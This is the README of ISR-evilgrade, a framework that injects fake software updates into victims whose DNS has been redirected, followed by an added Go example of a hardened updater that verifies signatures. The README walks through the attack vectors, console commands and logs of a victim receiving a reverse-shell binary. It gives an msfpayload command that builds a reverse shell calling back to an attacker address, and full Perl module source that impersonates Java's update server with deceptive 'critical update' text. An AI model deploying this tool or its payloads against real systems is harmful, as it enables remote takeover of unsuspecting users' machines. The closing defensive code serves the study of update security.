-- ISR - Infobyte Security Research --
ISR-evilgrade
www.infobyte.com.ar

..:: DESCRIPTION

ISR-evilgrade is a modular framework that allows us to take advantage of poor upgrade implementations by injecting fake updates.

* How does it work?

It works with modules; each module implements the structure needed to emulate a fake update of a specific application/system.
Evilgrade needs the manipulation of the victim's DNS traffic.

Attack vectors:
--------------
Internal scenario:
- Internal DNS access
- ARP spoofing
- DNS Cache Poisoning
- DHCP spoofing

External scenario:
- Internal DNS access
- DNS Cache Poisoning

* What are the supported OS?

The framework is multiplatform; it only depends on having the right payload for the target platform to be exploited.

Implemented modules:
-------------------
- Java plugin
- Winzip
- Winamp
- MacOS
- OpenOffice
- iTunes
- Linkedin Toolbar
- DAP [Download Accelerator]
- notepad++
- speedbit

..:: USE

It works similar to an IOS console:

evilgrade>help
Type 'help command' for more detailed help on a command.
Commands:
  configure - Configure - no help available
  exit      - exits the program
  help      - prints this screen, or help on 'command'
  reload    - Reload to update all the modules - no help available
  restart   - Restart webserver - no help available
  set       - Configure variables - no help available
  show      - Display information of .
  start     - Start webserver - no help available
  status    - Get webserver status - no help available
  stop      - Stop webserver - no help available
  version   - Display framework version. - no help available

#### Show implemented modules
evilgrade>show modules
List of modules:
===============
sunjava
winzip
winscp
speedbit
linkedin
winamp
openoffice
itunes
osx
notepadplus
dap

#### Configure the specified module
evilgrade>conf sunjava
evilgrade(sunjava)>

#### Show the module's options
#### VirtualHost is the webserver that we are going to emulate (Java's master update webserver)
#### agent: it is our fake update binary; we have to set a path or implement a dynamic fake update binary generation (see ADVANCED)
evilgrade(sunjava)>show options
Display options:
===============
Name = Sun Microsystems Java
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobyte.com.ar>"]
Description = ""
VirtualHost = "java.sun.com"
.-------------------------------------------------------------------------------------------------------------------------.
| Name         | Default                                         | Description                                            |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website      | http://java.com/moreinfolink                    | Website displayed in the update                        |
| enable       | 1                                               | Status                                                 |
| atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |
| arg          |                                                 | Arg passed to Agent                                    |
| adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup  |
| description  | This critical update fix internal vulnerability | Description to be displayed during the update          |
| agent        | ./agent/reverseshellsign.exe                    | Agent to inject                                        |
| title        | Critical update                                 | Title name displayed in the update                     |
'--------------+-------------------------------------------------+--------------------------------------------------------'

#### Start the fake update server
evilgrade>start
evilgrade>
[25/7/2008:4:53:45] - [WEBSERVER] - Webserver ready. Waiting for connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

#### Show status and victims logs
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

..:: USAGE

#######################################
version - Display framework version.
#######################################
configure - Configure

Example:
-------
evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## back to the global configuration
evilgrade(sunjava)>conf
evilgrade>

#######################################
reload - Reload to get all modules updated (to refresh module modifications in the source code)

#######################################
start - Start webserver

#######################################
restart - Restart webserver (fake update server)

#######################################
stop - Stop webserver (fake update server)

#######################################
status - Get webserver and victims status

Example:
-------
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

#######################################
show - Display information of .

#######################################
show active - Display active modules in the webserver

#######################################
show modules - Display implemented modules

#########################################
show options - Display module/global options

Example:
-------
evilgrade>show options
Display options:
===============
.--------------------------------------------.
| Name  | Default | Description              |
+-------+---------+--------------------------+
| debug | 0       | Debug mode               |
| port  | 80      | Webserver listening port |
'-------+---------+--------------------------'

-

evilgrade(sunjava)>show options
Display options:
===============
Name = Sun Microsystems Java
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobyte.com.ar>"]
Description = ""
VirtualHost = "java.sun.com"
.-------------------------------------------------------------------------------------------------------------------------.
| Name         | Default                                         | Description                                            |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website      | http://java.com/moreinfolink                    | Website displayed in the update                        |
| enable       | 1                                               | Status                                                 |
| atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |
| arg          |                                                 | Arg passed to Agent                                    |
| adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup  |
| description  | This critical update fix internal vulnerability | Description to be displayed during the update          |
| agent        | ./agent/reverseshellsign.exe                    | Agent to inject                                        |
| title        | Critical update                                 | Title name displayed in the update                     |
'--------------+-------------------------------------------------+--------------------------------------------------------'

#########################################
set - Configure global or module variables

Example:
-------
evilgrade>show options
Display options:
===============
.--------------------------------------------.
| Name  | Default | Description              |
+-------+---------+--------------------------+
| debug | 0       | Debug mode               |
| port  | 80      | Webserver listening port |
'-------+---------+--------------------------'

evilgrade>set debug 1
set debug, 1

evilgrade>show options
Display options:
===============
.--------------------------------------------.
| Name  | Default | Description              |
+-------+---------+--------------------------+
| debug | 1       | Debug mode               |
| port  | 80      | Webserver listening port |
'-------+---------+--------------------------'
evilgrade>

###############################
exit - exits the program

#######################################
help - prints this screen, or help on 'command'

#######################################

..:: DEMO

http://www.infobyte.com.ar/demo/evilgrade.htm

..:: ADVANCED

Module options:
Each module has its own special options, but the option "agent" is always present.

agent: it is our fake update binary; we have to set a path or implement a dynamic fake update binary generation.

Dynamic fake update binary generation allows the execution of an external command to generate our binary, for example using msfpayload from Metasploit. With this feature we can import any Metasploit payload or use an external interface to create the binary.

Example:
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
evilgrade(sunjava)>

In this case, for every requested update binary we generate a fake update binary with the payload "windows/shell_reverse_tcp", which connects back to the address 192.168.233.2 on port 4141.

The label <%OUT%>...<%OUT%> is a special tag that marks where the output binary is going to be generated.
Evilgrade detects the use of the "dynamic fake update binary" feature because the command is enclosed in square brackets "[]".
Inside the brackets we have another string between "" that is evaluated by Perl.

For example, if we use:
evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

every time we get a binary request, evilgrade will evaluate the line and execute the final string "./generatebin -o /tmp/update(random).exe".

..:: MODULE DEVELOPMENT

Module development is very simple.
You have to use a package .pm. We are going to describe the sunjava update module (comments with #):

package modules::sunjava;            # name of the package
use strict;
use Data::Dump qw(dump);             # internal use

my $base = {
    'name'        => 'Sun Microsystems Java',   # name of the module displayed in the framework
    'version'     => '1.0',                     # internal module version
    'appver'      => '< 1.6.0_03',              # last application version tested with this evilgrade module
    'author'      => [ 'Francisco Amato < famato +[AT]+ infobyte.com.ar>' ],   # author
    'description' => qq{},                      # small description
    'vh'          => 'java.sun.com',            # the first host the application uses to search for the update
                                                # configuration files and update binaries

    # Then we have the collection of request objects
    'request' => [
        # Each object is a possible HTTP request inside the virtualhost configured for the module (java.sun.com)
        {
            'req'    => '^/update/[.\d]+/map\-[.\d]+.xml',   # the required URL (regex friendly)
            'type'   => 'file',     # the type of response (file|string|agent|install)
            # We can use:
            #   file:    respond with the content of the file referenced in the "file" option below (./include/sunjava_map.xml)
            #   string:  respond with the string referenced in the "string" option below
            #   agent:   respond with the content of the file referenced in the "agent" option (options section)
            #   install: respond with the content of the file referenced in the "file" option below;
            #            it is used to know whether the fake update was executed. In some update
            #            processes we can specify a final page after the update is installed,
            #            so we send the client to a controller page.
            'method' => '',         # not implemented
            'bin'    => '',         # set to 1 if we are going to send a binary file
            'string' => '',         # if we choose the type string, we set the response in this variable
            'parse'  => '',         # set to 1 if the file or string needs to be parsed with the options
            'file'   => './include/sunjava_map.xml'   # the path of the file to send
        },
        {
            'req'    => '^/java_update.xml$',
            'type'   => 'file',
            'method' => '',
            'bin'    => '',
            'string' => '',
            'parse'  => '1',        # In this case we parse the file.
            # To parse the file we use special tags <%OPTIONNAME%> inside the "file" or "string".
            # These tags are replaced with the values of the options; for example
            # <%TITLE%> will be replaced by 'Critical update'.
            'file'   => './include/sunjava_update.xml'
        },
        {
            'req'    => '.exe',
            'type'   => 'agent',    # here we have an agent type and a binary response
            'bin'    => 1,
            'method' => '',         # any
            'string' => '',
            'parse'  => '',
            'file'   => ''
        }
    ],

    # Here we have the options displayed when we are in the conf mode of the module and we send the command "show options".
    # These options are used to parse the string or file used in the responses.
    'options' => {
        'agent'  => { 'val'  => './agent/reverseappsign.exe',   # VAL is the default value
                      'desc' => 'Agent to inject' },            # DESC is a minimal description
        'arg'    => { 'val' => '', 'desc' => 'Arg passed to Agent' },
        'enable' => { 'val' => 1,  'desc' => 'Status' },
        # The following is a dynamic hidden option.
        # In this case we use the tag <%NAME%> to parse the files and execute Perl functions to get random values.
        # You can use whatever you like in Perl; for more functions see "isrcore/utils.pm".
        'name'   => { 'val'     => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                      'hidden'  => 1,
                      'dynamic' => 1, },
        # All the options depend on the update process.
        # You have to research the possible variables and implement them in your module.
        # These are the common update messages, web pages, descriptions, popup messages, title, etc.
        'title'        => { 'val'  => 'Critical update',
                            'desc' => 'Title name displayed in the update' },
        'description'  => { 'val'  => 'This critical update fix internal vulnerability',
                            'desc' => 'Description to be displayed during the update' },
        'atitle'       => { 'val'  => 'Critical vulnerability',
                            'desc' => 'Title name to be displayed in the systray item popup' },
        'adescription' => { 'val'  => 'This critical update fix internal vulnerability',
                            'desc' => 'Description to be displayed in the systray item popup' },
        'website'      => { 'val'  => 'http://java.com/moreinfolink',
                            'desc' => 'Website displayed in the update' }
    }
};

1;

..:: REQUIREMENTS

Perl Modules:
Data::Dump   [http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/Data-Dump-1.08.tar.gz]
Digest::MD5  [http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/Digest-MD5-2.36.tar.gz]
Time::HiRes  [http://search.cpan.org/CPAN/authors/id/J/JH/JHI/Time-HiRes-1.9715.tar.gz]

..:: MORE INFORMATION

Presentation: http://www.infobyte.com.ar/down/Francisco-Amato-evilgrade-ENG.html

This framework was presented at the following security conferences:
ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.com.ar]
Troopers 2008 [Munich, Germany] [www.troopers08.org]
Shakacon 2008 [Hawaii, USA] [www.shakacon.org]

..:: DOWNLOAD

http://www.infobyte.com.ar/developments.html

..:: AUTHOR

Francisco Amato
famato+at+infobyte+dot+com+dot+ar
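Everything in the USE and MODULE DEVELOPMENT sections above depends on one weakness in the client: the updater fetches its manifest (java_update.xml in the sunjava module) and then its binary from whatever host the victim's DNS resolves, and runs what it gets without checking who signed it. The following Go program is an added example that is not part of the evilgrade README or of the tool itself; it contrasts that naive updater with a hardened one that pins the vendor's release key, verifies the manifest signature, requires an https download URL and checks the binary hash recorded in the signed manifest. The key pair, the JSON manifest format, the URLs and the sample bytes are all constructed for this example and are not taken from any real update protocol.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
)

// Manifest is the update descriptor an updater fetches first (the role that
// java_update.xml plays in the sunjava module). Constructed for this example.
type Manifest struct {
	Version string `json:"version"`
	URL     string `json:"url"`
	SHA256  string `json:"sha256"`
}

// newVendorKey stands in for the vendor's release key; the public half is what
// a hardened updater pins at build time. Constructed for this example.
func newVendorKey() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// buildSignedManifest is the vendor-side step: hash the genuine binary, embed
// the hash in the manifest and sign the manifest bytes with the release key.
func buildSignedManifest(priv ed25519.PrivateKey, version, dlURL string, binary []byte) (manifest, sig []byte) {
	sum := sha256.Sum256(binary)
	manifest, err := json.Marshal(Manifest{Version: version, URL: dlURL, SHA256: hex.EncodeToString(sum[:])})
	if err != nil {
		panic(err)
	}
	return manifest, ed25519.Sign(priv, manifest)
}

// naiveAccept models the weak updater evilgrade targets: whatever the host named
// by DNS serves is trusted, so a redirected client swallows a fake manifest.
func naiveAccept(manifest []byte) (Manifest, error) {
	var m Manifest
	err := json.Unmarshal(manifest, &m)
	return m, err
}

// verifyUpdate is the hardened path: the manifest must verify under the pinned
// key, the download URL must be https, and the fetched binary must hash to the
// value in the signed manifest. DNS redirection then yields only rejected data.
func verifyUpdate(pinned ed25519.PublicKey, manifest, sig, binary []byte) (Manifest, error) {
	var m Manifest
	if len(sig) != ed25519.SignatureSize || !ed25519.Verify(pinned, manifest, sig) {
		return m, errors.New("manifest signature invalid: not signed by the pinned update key")
	}
	if err := json.Unmarshal(manifest, &m); err != nil {
		return m, err
	}
	if u, err := url.Parse(m.URL); err != nil || u.Scheme != "https" {
		return m, errors.New("download URL must use https")
	}
	sum := sha256.Sum256(binary)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return m, errors.New("binary hash does not match the signed manifest")
	}
	return m, nil
}

// Fake manifest and binary of the kind a fake update server hands to a client
// whose DNS was redirected. Constructed sample data, not real update content.
var (
	fakeManifest = []byte(`{"version":"9.9.9","url":"http://java.sun.com/update/agent.exe","sha256":""}`)
	fakeBinary   = []byte("MZ...not the vendor's update...")
)

func main() {
	pub, priv := newVendorKey()
	genuine := []byte("MZ...genuine update bytes...")
	manifest, sig := buildSignedManifest(priv, "1.6.0_03", "https://java.sun.com/update/jre.exe", genuine)

	if _, err := verifyUpdate(pub, manifest, sig, genuine); err == nil {
		fmt.Println("hardened updater: genuine update accepted")
	}
	if _, err := naiveAccept(fakeManifest); err == nil {
		fmt.Println("naive updater: accepted the fake manifest")
	}
	if _, err := verifyUpdate(pub, fakeManifest, sig, fakeBinary); err != nil {
		fmt.Println("hardened updater:", err)
	}
	// A genuine manifest with a swapped download is caught by the hash check.
	if _, err := verifyUpdate(pub, manifest, sig, fakeBinary); err != nil {
		fmt.Println("hardened updater:", err)
	}
}
```

The order of the checks matters: the signature is verified over the raw manifest bytes before they are parsed, so an attacker who controls DNS cannot influence anything the client does until the pinned key has vouched for the manifest, and the binary's hash is compared only against a value that came from that signed manifest. Requiring https on the download URL is a second, independent layer; on its own it would not help if the updater also accepted any certificate, which is why the pinned signing key is the primary control.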